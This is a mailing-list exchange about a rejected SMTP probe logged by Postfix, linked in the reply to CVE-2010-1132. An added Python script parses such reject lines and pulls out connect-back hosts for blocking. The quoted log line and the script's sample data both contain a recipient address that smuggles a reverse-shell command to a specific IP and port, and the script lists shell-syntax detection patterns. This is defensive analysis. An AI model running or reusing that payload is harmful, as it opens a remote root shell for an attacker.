On Sat, 2011-02-12 at 14:53:53 -0700, Bob Proulx wrote:

> A friend's Mac running Postfix logged this rejected attack:
> 
>   Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT
>   from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command
>   rejected: need fully-qualified hostname; from=<b...@dick.com>
>   to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0>
>   proto=SMTP helo=<bluedick>
> 
> Of course this particular message was blocked at the HELO stage.  But
> I was curious as to what attack vector this was trying to exploit and
> against what mail transport agent?  I searched the web quite a bit and
> didn't see this particular attack discussed anywhere.
> 
> Obviously the /dev/tcp/host/port part is trying to connect back to a
> C&C host and attach the network connection to a root shell.  I
> understand the shell scripting part of the attack fine.
> 
> The remote mta security exploit I couldn't locate references to was
> the "to=<root+:|exec /bin/sh ..." part of the attack.  What mta is
> vulnerable to "+:|" in the To address?  Or perhaps none are and this
> is simply a failed probe attempt?

Likely related to CVE-2010-1132:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132
 http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

-- 
Sahil Tandon <sa...@freebsd.org>
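For anyone triaging similar reject lines on their own mail server, here is an added example (mine, not code from either poster or from Postfix) that parses the standard Postfix smtpd "NOQUEUE: reject: RCPT" log format, flags recipient addresses carrying shell metacharacters like the one quoted above, and pulls out the connect-back host and port from any `/dev/tcp/host/port` redirection so it can be blocked or hunted for. The sample log lines are constructed from the quoted reject (with a placeholder sender, since the original is elided) plus one benign reject for comparison; the field names and indicator list are my own assumptions.

```python
import re

# Constructed sample input: the reject line quoted in the thread, joined onto a
# single line as syslog records it, with a placeholder sender address, followed
# by a benign reject that should produce no finding.
SAMPLE_LOG = [
    "Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT "
    "from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command "
    "rejected: need fully-qualified hostname; from=<sender@example.invalid> "
    "to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> "
    "proto=SMTP helo=<bluedick>",
    "Feb 11 21:46:02 mailer postfix/smtpd[3710]: NOQUEUE: reject: RCPT "
    "from unknown[192.0.2.10]: 504 5.5.2 <laptop>: Helo command "
    "rejected: need fully-qualified hostname; from=<alice@example.invalid> "
    "to=<bob+newsletter@example.invalid> proto=SMTP helo=<laptop>",
]

# Postfix smtpd reject line. The to=<...> value may itself contain '<' and '>'
# (as the quoted payload does), so it is matched lazily up to "> proto=" rather
# than stopping at the first '>'.
REJECT_RE = re.compile(
    r"postfix/smtpd\[(?P<pid>\d+)\]: NOQUEUE: reject: RCPT from "
    r"(?P<client>[^:]+): (?P<code>\d{3} \d\.\d\.\d) (?P<reason>.*?); "
    r"from=<(?P<sender>[^>]*)> to=<(?P<rcpt>.*?)> proto=(?P<proto>\S+) "
    r"helo=<(?P<helo>[^>]*)>"
)

# Indicators of shell syntax smuggled into a recipient address (assumed list).
SHELL_INDICATORS = [
    ("pipe", re.compile(r"\|")),                      # pipe into a command
    ("exec", re.compile(r"\bexec\b")),
    ("shell_binary", re.compile(r"/bin/(?:ba|da|z)?sh\b")),
    ("dev_tcp", re.compile(r"/dev/tcp/")),            # bash network redirection
    ("fd_redirect", re.compile(r"\d[<>]|[<>]&\d")),   # e.g. 0<, 1>&0, 2>&0
]

DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<host>[\w.\-]+)/(?P<port>\d+)")


def parse_reject(line):
    """Return the fields of a Postfix smtpd RCPT reject line, or None."""
    m = REJECT_RE.search(line)
    return m.groupdict() if m else None


def shell_indicators(rcpt):
    """Names of the shell-syntax indicators present in a recipient string."""
    return [name for name, pat in SHELL_INDICATORS if pat.search(rcpt)]


def callback_target(rcpt):
    """(host, port) named by a /dev/tcp/host/port redirection, if any."""
    m = DEV_TCP_RE.search(rcpt)
    return (m.group("host"), int(m.group("port"))) if m else None


def triage(lines):
    """Return one finding per reject line whose recipient looks like shell code."""
    findings = []
    for line in lines:
        rec = parse_reject(line)
        if rec is None:
            continue
        hits = shell_indicators(rec["rcpt"])
        if not hits:
            continue
        findings.append({
            "client": rec["client"],
            "helo": rec["helo"],
            "sender": rec["sender"],
            "rcpt": rec["rcpt"],
            "indicators": hits,
            "callback": callback_target(rec["rcpt"]),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"client={f['client']} helo={f['helo']} "
              f"indicators={','.join(f['indicators'])} callback={f['callback']}")
```

Run it over `grep 'NOQUEUE: reject: RCPT' /var/log/mail.log` output to list the callback hosts that probes like this one are pointing at; an address that trips these indicators is never a legitimate recipient, so the finding list can feed a firewall block or an IOC search rather than needing further review.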